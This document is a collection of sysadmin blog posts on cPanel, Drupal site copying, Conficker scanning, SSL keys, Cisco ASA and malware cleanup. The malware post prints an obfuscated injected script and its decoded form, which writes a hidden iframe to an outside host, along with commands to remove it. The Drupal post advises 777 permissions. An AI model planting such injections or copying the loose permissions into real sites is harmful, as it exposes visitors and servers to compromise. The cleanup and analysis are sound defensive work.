Linux Sysadmin Blog

Change Hostname of Cpanel Server


This task is very simple and can be done in two steps:

1.)  Log in as root and change your server hostname:

hostname newhost.name.tld

Note: Don’t forget to create an A record for your new hostname, otherwise you will get a popup message during WHM login.

2.)  Run /usr/local/cpanel/cpkeyclt to update your cPanel license key, otherwise you will get “Invalid License” when you log in to the WHM/cPanel interface.

Drupal HowTo: Duplicate / Copy Drupal Site


This post covers the steps to copy, transfer, or duplicate a Drupal site to a new domain, or from a development/test site to a live/production server. This requires shell/command-line access to the server/accounts. I attached (below) some bash/shell scripts that I used to perform these tasks.

Backup: If the destination site or account already has content, back it up first or move it to a separate location.

Copy/Transfer Procedures

Database:

1.) Create an SQL dump of your source database (use mysqldump).
2.) Update references to the domain/URL and to the path or home directory (you can use perl/sed commands).
3.) Import the dump into your destination database (using mysql).

Files/Codes:

1.) Copy all files from your source directory or account to the destination site.
2.) Update references to the database name, database user, database password, home directory of the Drupal installation, and domain name or URL.
3.) Update permissions and ownership of files and directories, e.g. sites/default/files to 777.

Notes: If you have CiviCRM installed on a separate database, you can use this guide, but do not update the references to URLs and paths. This guide is not applicable if your CiviCRM installation shares the Drupal database. CiviCRM’s recommended install uses a separate database.
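As an added example (not one of the post’s downloadable scripts), the shell functions below carry the three database steps through (dump, rewrite, import) and add the check a Drupal copy needs before the import: Drupal keeps many settings (the variable table, cache entries) as PHP-serialized data, in which every string is prefixed with its byte length, so a plain sed replacement that changes the length of a URL or path leaves values PHP can no longer unserialize. Database names, users, URLs and paths are placeholders, and the three-line dump is constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not one of the post's scripts. Database half of a Drupal copy:
# dump, rewrite URL/home-directory references, check the rewrite did not break
# PHP-serialized strings, then import. All names and paths are placeholders.

# Step 1: dump the source database ($1 user, $2 database, $3 dump file);
# -p without a value prompts for the password instead of leaving it in history.
dump_source_db() {
    mysqldump -u "$1" -p "$2" > "$3"
}

# Step 2: rewrite references. '|' is the sed delimiter because both the URLs
# and the paths contain '/'.
rewrite_dump() {
    in="$1"; out="$2"; old_url="$3"; new_url="$4"; old_home="$5"; new_home="$6"
    sed -e "s|$old_url|$new_url|g" -e "s|$old_home|$new_home|g" "$in" > "$out"
}

# Count serialized strings whose declared length (s:31:"...") no longer matches
# the body that follows it. 0 means the dump is safe to import; anything else
# points at values that must be fixed by hand or replaced with same-length text.
count_bad_serialized() {
    LC_ALL=C awk '
        {
            line = $0
            while (match(line, /s:[0-9]+:\\?"/)) {
                hdr = substr(line, RSTART, RLENGTH); gsub(/[^0-9]/, "", hdr)
                len = hdr + 0
                start = RSTART + RLENGTH             # first byte of the string body
                after = substr(line, start + len, 3) # expect "; (written \"; inside a SQL literal)
                if (after !~ /^\\?";/) bad++
                line = substr(line, start)
            }
        }
        END { print bad + 0 }' "$1"
}

# Step 3: import into the destination database ($1 user, $2 database, $3 dump file).
import_dump() {
    mysql -u "$1" -p "$2" < "$3"
}

# Constructed three-line dump used to exercise the rewrite offline.
make_sample_dump() {
    cat > "$1" <<'EOF'
INSERT INTO `variable` VALUES ('site_url','s:23:\"http://dev.example.test\";');
INSERT INTO `variable` VALUES ('file_directory_path','s:31:\"/home/devuser/public_html/files\";');
INSERT INTO `node` VALUES (1,'Welcome to http://dev.example.test/');
EOF
}
```

Run rewrite_dump and then count_bad_serialized on its output before import_dump. In the sample, dev to www keeps the URL length, so that serialized value survives, while /home/devuser to /home/liveuser grows the path by one byte and is reported; values like that are better corrected in the Drupal admin UI after the import than patched in the dump.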

Shell / Bash Scripts:

1.)  Copy Drupal Site with CiviCRM.  Download here!

2.)  Copy Drupal Site without CiviCRM.  Download here!

Note: You can modify these scripts to work with sub-domains. Let me know if you have questions or suggestions or if you need help.

Big Brother Can Pull the Plug


A newly introduced bill in the United States Senate could give the US government the ability to limit and even shut down the Internet traffic of public and private companies. In order to do this the president would first have to declare a “cybersecurity emergency”, followed by an order for the “limitation or shutdown of internet traffic to and from any compromised federal government or United States critical infrastructure information system or network”.

Another troubling part of this legislation could allow the government to “establish a broad set of cybersecurity standards that would be imposed on the government and the private sector, including companies that provide software, IT work or other services to networks that are deemed to be critical infrastructure”. Given the government’s track record of defending its own networks, this may be a step backwards, considering the fifty or so incidents in 2009 alone.

And last but not least, the good ol’ saying “it’s who you know, not what you know” may ring louder than ever. Under this legislation it would also be illegal for employees or contractors to provide “cybersecurity services to any federal agency or an information system or network designated by the president, or the president’s designee, as a critical infrastructure information system or network, who is not licensed and certified under the program.” Obviously Tom Parker, director of security services at Securicom, thinks the bill is a great idea, considering the $3.3 million in federal contract money the company has already accrued.

Scanning for Conficker With Nmap


While Conficker is not a new worm, it has been getting much press lately. Even though Redmond released a patch late last October, it is estimated that 5 to 10 million PCs have been infected. The industry has been aware of this worm for some time and has mounted a fairly impressive counter-attack. Microsoft issued a $250K bounty on the developers of Conficker, major anti-virus vendors have added definitions for detection and removal of the worm, OpenDNS introduced a feature that helps sysadmins detect infected machines, and today, with the help of the Honeynet Project, security researchers discovered Conficker’s fingerprint, which makes it possible for tools such as Nmap and Nessus to detect the worm remotely. This discovery comes just in time, as the latest variant of the worm, “Conficker C”, is programmed to lie dormant, unlike the previous generations, where identification of the worm was possible by monitoring outbound traffic.

Why just in time, you may ask? Because the worm is said to become active on April 1st. It is unknown whether all infected PCs will be used for bad deeds. I’m sure no one needs a reminder of the SQL Slammer worm of 2003/2004, when 5 of the 11 root DNS servers went down and ATMs were knocked offline due to massive DDoS attacks. I understand the symbolism of April 1st being April Fools’ Day, but as the doctor always says: it’s far easier to prevent than to treat.

Using the latest development version of Nmap, run the following command to scan systems for the Conficker signature:

nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1 [targetnetworks]

Or, after updating your Nessus server’s plugins with nessus-update-plugins, create and run a scan that includes plugin ID #36036 (if you don’t pay for the Nessus Professional feed you will have to wait 7 days to receive the plugin).

Be mindful that Conficker can also spread via sneakernet; configuring your anti-virus client to scan all attached/removable external storage devices is always a good idea.
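As an added example (not part of the original post), the shell functions below wrap the Nmap command above, save its normal output with -oN, and parse that output into the list of hosts whose smb-check-vulns result reports Conficker, so a scan of a subnet turns directly into a cleanup list. The report layout (a “Nmap scan report for <host>” or older “Interesting ports on <host>:” header per host, followed by a “Conficker: Likely INFECTED/CLEAN” line from the script) is assumed from the script’s output format, and the sample report is constructed.

```shell
#!/bin/sh
# Added example, not from the original post: turn the smb-check-vulns scan
# output into a remediation list. Report layout is assumed (see lead-in).

# Run the post's scan against $1 and keep the normal output in $2.
scan_for_conficker() {
    nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1 -oN "$2" "$1"
}

# Print "<host> <verdict>" for every Conficker line in an nmap normal-output file.
conficker_verdicts() {
    LC_ALL=C awk '
        /^Nmap scan report for / { host = $5; next }
        /^Interesting ports on /  { host = $4; sub(/:$/, "", host); next }
        /Conficker:/ {
            verdict = $0
            sub(/.*Conficker:[ \t]*/, "", verdict)   # keep only the text after "Conficker:"
            print host, verdict
        }' "$1"
}

# Only the hosts that need cleanup, one per line.
infected_hosts() {
    conficker_verdicts "$1" | awk '/INFECTED/ { print $1 }'
}

# Constructed sample report (two hosts, one flagged) to exercise the parser offline.
make_sample_report() {
    cat > "$1" <<'EOF'
Nmap scan report for 192.0.2.10
Host is up (0.0010s latency).
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|  smb-check-vulns:
|  MS08-067: VULNERABLE
|  Conficker: Likely INFECTED
|_ regsvc DoS: NOT VULNERABLE

Nmap scan report for 192.0.2.11
Host is up (0.0010s latency).
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|  smb-check-vulns:
|  MS08-067: NOT VULNERABLE
|  Conficker: Likely CLEAN
|_ regsvc DoS: NOT VULNERABLE
EOF
}
```

Typical use is scan_for_conficker 192.0.2.0/24 scan.txt followed by infected_hosts scan.txt; because the -oN file is kept, the full per-host detail (including the MS08-067 line) stays available for the incident record.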

Rush to Stake a Claim in the Cloud


Last week I was on a conference call with a potential client when one of the senior business people said: “And then we could use cloud computing or something, to get this application in the hands of everyone”.

That’s when I thought - wow - this term really has penetrated into the mainstream.  Cloud Computing has crossed the chasm, except that it seems to be more of a catch phrase for the latest technical fad, except that no one seems to be talking about exactly the same thing.  

As if on cue the next morning the Wall Street Journal:  The Internet Industry Is on a Cloud – Whatever That May Mean by Geoffrey A. Fowler and Ben Worthen landed on my lap.  Ok, it landed on my porch, and then I read it.

I hope the Journal doesn’t mind if I borrow their image of the cloud - very fitting for the article.  Basically it’s a tale of marketers trying to - or should I say - fighting for integration of the term into their product jargon.

Some of my favorite quotes from the piece are below.  I recommend the quick article as a nice distraction, but don’t expect to come away being clear on the term “Cloud Computing”.

“I have no idea what anyone is talking about,” said Oracle Corp. Chief Executive Larry Ellison, when talking about cloud computing at a financial analyst conference in September. “It’s really just complete gibberish. What is it?” He added: “When is this idiocy going to stop?”

In the full fiscal year since Salesforce started using the term cloud computing, its revenue grew 44%. “I think it’s the most powerful term in the industry,”

Dell Inc. applied to trademark the term cloud computing last year. The U.S. Patent and Trademark Office initially approved the application. But it changed its mind in response to an outburst of criticism, including from bloggers incensed that the term could fall under one company’s control.

Adding Custom Mantis Bug Status


This post will guide you through adding a new or custom ticket status to your Mantis bug tracker installation. In our case we will refer to the new status as GTG (GoodToGo). A ticket will have this status when it is ready to push to production. To do this we need to edit two files, config_inc.php and custom_strings_inc.php (create this file if it does not exist).

Changes to config_inc.php:

Find this line (bottom):

$g_status_enum_string = '10:new,20:feedback,30:acknowledged,40:confirmed,50:assigned,
80:resolved,90:closed';

and insert your new bug status together with its number. You can assign the number depending on the level of the status you want. For example, my GTG status is higher than “resolved” but less than “closed”, so I can assign 81 to 89.

$g_status_enum_string = '10:new,20:feedback,30:acknowledged,40:confirmed,50:assigned,
80:resolved,85:GTG,90:closed';

Assign a color for your bug status, example:

$g_status_colors['GTG'] = '#cceedd';

Changes to custom_strings_inc.php:

Create the definitions for your new status:

$g_status_enum_string = '10:new,20:feedback,30:acknowledged,40:confirmed,50:assigned,
80:resolved,85:GTG,90:closed';
$s_GTG_bug_button = "GTG Issue";
$s_GTG_bug_title = "Set Issue to GTG";
$s_email_notification_title_for_status_bug_GTG = "The following issue is GTG.";

That’s all and you should see your new status.

Remove Passphrase From Private Key


We have several SSL certificates to transfer to our new load balancer (Nginx), and all of the private keys have a passphrase. During an Nginx (same with Apache) service restart it asks for the passphrase of every certificate, so we need to remove it.

This task is very simple; you only need to issue this command:

/usr/sbin/openssl rsa -in privkey_with_passphrase.key -out privkey_without_passphrase.key

This will prompt you to enter the current passphrase.
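As an added example (not part of the original post), the shell functions below do the same openssl rsa conversion non-interactively, so it can be scripted across all of the keys being migrated, and add the two checks worth doing before the unencrypted key goes onto the load balancer: the file is created with owner-only permissions (an unencrypted key is only as safe as its file mode), and the key is parsed and its modulus compared with the certificate it is deployed with. File names and the passphrase are placeholders; the key and self-signed certificate used as a fixture are generated on the fly for the demonstration.

```shell
#!/bin/sh
# Added example, not part of the original post. Strips the passphrase from an
# RSA private key and verifies the result before it is handed to Nginx/Apache.
# File names and the passphrase below are placeholders.

# Remove the passphrase from $1, writing $2; the current passphrase is $3.
# umask 077 runs in a subshell so only the new key file gets mode 0600.
strip_passphrase() {
    ( umask 077; openssl rsa -in "$1" -out "$2" -passin "pass:$3" 2>/dev/null )
}

# The output must not be encrypted any more and must still parse as a valid key.
key_is_plain() {
    if grep -q 'ENCRYPTED' "$1"; then
        return 1
    fi
    openssl rsa -in "$1" -check -noout >/dev/null 2>&1
}

# The unencrypted key ($1) must belong to the certificate ($2) it is deployed with.
key_matches_cert() {
    k=$(openssl rsa -in "$1" -modulus -noout 2>/dev/null)
    c=$(openssl x509 -in "$2" -modulus -noout 2>/dev/null)
    [ -n "$k" ] && [ "$k" = "$c" ]
}

# Constructed fixture: a throw-away passphrase-protected key plus a self-signed
# certificate for it, written into directory $1.
make_fixture() {
    openssl genrsa -aes256 -passout pass:secret -out "$1/enc.key" 2048 2>/dev/null
    openssl req -new -x509 -key "$1/enc.key" -passin pass:secret \
        -subj "/CN=example.test" -days 1 -out "$1/cert.pem" 2>/dev/null
}
```

For a real migration, call strip_passphrase on each key, then key_is_plain and key_matches_cert against the certificate that Nginx will serve; a mismatch usually means the wrong key file was copied alongside the certificate.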

HEUR:Trojan.Script.Iframe


One of my friends asked for help with a virus appearing on his sites (mostly WordPress sites).  I checked it out and my Kaspersky Internet Security blocked the pages from loading, so I downloaded the files manually and scanned the HTML with Kaspersky to determine the affected files.


I noticed that only PHP and HTML files were affected, and if you compare the code of the original WordPress files with the infected ones you will see the difference.  Below is a sample of the added code/virus:

HTML files:

<script type="text/javascript">eval(String.fromCharCode(118,97...50,55))</script>

PHP files:

<?php echo '<script type="text/javascript">eval(String.fromCharCode(118,97...50,55))</script>'; ?>

What it does

I’m not a virus expert, but I was curious about what this portion of code does, so I looked at it. In our case the resulting text adds this portion of code to the HTML or PHP files:

var fggge3="si";
var w345="pl";
var re6="ank.";
var rr="com";
var a="if";
var s="tt";
document.write('<'+a+'rame src="h'+s+'p://'+fggge3+''+w345+''+re6+''+rr+'/'+'qqp/'+''+''+'" style="d'+'isplay:n'+'one">');
var t=00001217

and you can see that it tries to load a hidden iframe:

<iframe src=http://siplank.com/qqp/ style=display:none>
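The decoding step above can be done without ever running the injected script. As an added example (not part of the original post), the shell functions below pull the numbers out of a String.fromCharCode(...) call with awk and print the text they encode, then flag the decoded stage if it writes markup into the page, builds an iframe, or evaluates further code. The sample payload is constructed for the demonstration; nothing in it is executed.

```shell
#!/bin/sh
# Added example, not part of the original post: static decode of the
# String.fromCharCode(...) obfuscation, so the payload can be read without
# being run. The sample below is constructed.

# Print the text that the String.fromCharCode(...) call inside $1 would produce.
decode_charcodes() {
    printf '%s\n' "$1" | LC_ALL=C awk '
        {
            if (match($0, /String\.fromCharCode\([0-9, ]*\)/)) {
                # drop the 20-character "String.fromCharCode(" prefix and the ")" suffix
                list = substr($0, RSTART + 20, RLENGTH - 21)
                n = split(list, code, /[, ]+/)
                out = ""
                for (i = 1; i <= n; i++)
                    if (code[i] != "") out = out sprintf("%c", code[i] + 0)
                print out
            }
        }'
}

# True if the decoded stage does something an injected script typically does:
# write markup, build an iframe, or evaluate yet another stage.
looks_malicious() {
    decoded=$(decode_charcodes "$1")
    printf '%s' "$decoded" | grep -Eqi 'document\.write|iframe|eval\(|unescape\('
}

# Constructed sample: the codes spell out document.write('x')
SAMPLE='<script type="text/javascript">eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,120,39,41))</script>'
```

Running decode_charcodes on a real infected line gives the first stage of the script, which in this case is the variable-concatenation code shown above; a second decode pass is not needed because that stage already exposes the iframe source in pieces.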

Virus Removal

You can remove the virus by just deleting the code (sample above) from the affected files. If you need to clean up hundreds of infected files (in our case more than 800) you can do the following:

  • Get the list of infected files.  You can use grep to search for them (-l prints only the matching file names, one per line):
grep -l -R "eval(String.fromCharCode(118,97,114" /path/to/site > affected_file_list.txt
  • Delete the code by using perl/sed commands.  Repeat the commands for every file.
perl -pi -e 's/<script type="text\/javascript">eval\(String.fromCharCode\(118,97,114...51,51\)\)<\/script>//g' /path/to/affected/file.htm
# the PHP variant wraps the same script tag in an echo; \x27 stands for the single quote inside the pattern
perl -pi -e 's/<\?php echo \x27<script type="text\/javascript">eval\(String.fromCharCode\(118,97,114...51,51\)\)<\/script>\x27; \?>//g' /path/to/affected/file.php

Or create a bash/shell script to do the cleanup at once:

# read one file path per line from the grep -l list; IFS= and -r keep paths intact
while IFS= read -r file
do
    perl -pi -e 's/<script type="text\/javascript">eval\(String.fromCharCode\(118,97,114...51,51\)\)<\/script>//g' "$file"
    perl -pi -e 's/<\?php echo \x27<script type="text\/javascript">eval\(String.fromCharCode\(118,97,114...51,51\)\)<\/script>\x27; \?>//g' "$file"
done < affected_file_list.txt

That’s all.

I don’t know how the attacker gained access to the files and inserted the code, because the file permissions are OK - maybe they gained FTP access.

ASA Allow Passive Ftp Traffic


Many FTP clients will try to establish a passive connection with a server by default. A passive connection (PASV) uses a high-numbered unprivileged port, greater than 1023, instead of port 20 (PORT). Most FTP servers specify different port ranges to be used for passive connections.

When you are managing multiple FTP servers it is rather impractical to configure a specific passive port range for each FTP server and open those ports in the firewall. A quicker and much more practical solution is to use the stateful application inspection feature of the Adaptive Security Appliance. To set up inspection of the FTP protocol, which dynamically allows the secondary data ports to pass as well as allowing NAT traversal of those ports, we first create a class map for all interfaces that matches services on their standard ports:

class-map global-class
match default-inspection-traffic

Next, configure a policy map that applies inspection of the FTP protocol to that class:

policy-map global-policy
 class global-class
  inspect ftp

Ffmpeg New Major Release


FFmpeg announced a new release today: version 0.5.

Slashdot percolated this FFmpeg-related post to the top of its news today:

After many years of release-free development, FFmpeg, the most widely used audio and video codec library, has finally returned to a regular release schedule with the long-awaited version 0.5

Here is a very abbreviated list of some of the improvements to the converter, from the official FFmpeg site:

Significant work to support at least decoding of all widespread mainstream proprietary codecs, such as:

  • decoders and encoders
    • ALAC
    • Flash Screen Video
    • WMAv2 decoder fixed, WMAv1/v2 encoder
  • decoders
    • Atrac3
    • MLP/TrueHD
    • On2 VP3 improvements and VP5/VP6 support
    • RealAudio Cooker and fixes for 14.4 and 28.8
    • RealVideo RV30/40
    • WMV3/WMV9/VC-1 and IntraX8 frame support for WMV2/VC-1

We sysadmins at Promet have used FFmpeg in several of our projects and find it a great tool. Our recent implementations include a video distance-learning tool, and it is also used in some of our work on sites for members of the House of Representatives that use this video platform.